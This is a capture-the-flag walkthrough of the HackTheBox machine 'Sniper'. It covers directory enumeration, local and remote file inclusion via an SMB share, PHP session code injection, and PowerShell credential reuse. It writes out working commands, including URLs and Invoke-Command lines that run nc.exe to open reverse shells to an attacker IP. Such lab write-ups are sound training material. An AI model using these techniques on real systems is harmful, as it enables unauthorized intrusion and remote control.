HackTheBox - Sniper

Nmap scan results

I also started a all port scan in the background. So let's start enumerating the web server. All port scan revealed a new port.

Scanning the webserver with GoBuster

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.151/ -o gobuster-dir-root.out -t 10
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.151/blog/ -o gobuster-dir-blog.out -t 10
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.151/user/ -o gobuster-dir-user.out -t 10

Identifying LFI (Local File Inclusion) vulnerability

We have LFI vulnerability present in the lang parameter. To check if it is working, we can try to include win.ini file. (Windows File Inclusion)

We can also try Remote File Inclusion and for that I will set up a simple SMB Server on my Linux Machine. I tried using impacket's smb server, but that didn't work. So I will use default SMB Server for this.

Code Execution using RFI (Remote File Inclusion)

Editing the smb.conf file to setup a Samba Server on my local machine.

Let's see if this works. We can access shell.php by using \\10.10.14.5\smb\shell.php

Yes, we have code execution. Now let's try to get a reverse shell.

One thing to keep in mind, as we are using SMB Server to make the transfer and execution of files, we need to change the file permissions to be executable or the payload will not work at all.

http://sniper.htb/blog/?lang=\\10.10.14.5\smb\shell.php&cmd=\\10.10.14.5\smb\nc.exe+10.10.14.5+4444+-e+powershel

rlwrap is a 'readline wrapper', a small utility that uses the GNU Readline library to allow the editing of keyboard input for any command.

Injecting Code via PHP Sessions

As we already have Local File Inclusion, we can try to inject PHP Code via sessions. In linux system, the php sessions are stored in /var/lib/php5/sessions but in windows machines, they are stored in C:\Windows\Temp.

Now the session will be stored at the following location : C:\windows\temp\sess_2gm8cb74cbhn3k2bm4eio55vqv

Considering the bad characters, we need to keep the payload short and less intriguing.

# PHP Payload
<?=`dir`?>

We will register a account with the above payload and then check if we get any Code execution or not.

https://www.youtube.com/watch?v=k7gD4ufex9Q (Ippsec's video)
https://book.hacktricks.xyz/pentesting-web/file-inclusion#via-php-sessions (Docs)

Some powershell Tricks

We need to encode the payload in order to work in powershell environment. We can use iconv tool in our local kali machine.

echo "ping -n 3 10.10.14.5" | iconv -t utf-16le | base64 -w 0

In general, Windows PowerShell uses the Unicode UTF-16LE encoding by default. However, the default encoding used by cmdlets in Windows PowerShell is not consistent.

Getting Shell as Chris

The same old thing that we used to do in Linux machine was to find SQL credentials and as this machine uses PHP as its back-end, we can potentially search for creds.

To get information about all the users present in the machine, we can use net user command or to get a detailed information about a specific user, we can use net user <name>

In order to run commands (or to get shell as Chris), we need to create a credential object for that user. As we will be using Invoke-Command in powershell

The PSCredential is a placeholder for a set of credentials – it basically contains a username and a password. ... By wrapping your credentials as an object and storing it in a Power-Shell variable, e.g. $Credential, you can use it programmatically in any way you see fit.

$pass = ConvertTo-SecureString "36mEAhz/B8xQ~2VM" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('SNIPER\chris',$pass)
Invoke-Command -ComputerName SNIPER -Credential $creds -ScriptBlock {whoami}

Invoke-Command -ComputerName SNIPER -Credential $creds -ScriptBlock {\10.10.14.5\smb\nc.exe 10.10.14.5 1234 -e powershell}

PreviousHackTheBox - Arctic NextHackTheBox - Querier

Last updated 3 years ago

Was this helpful?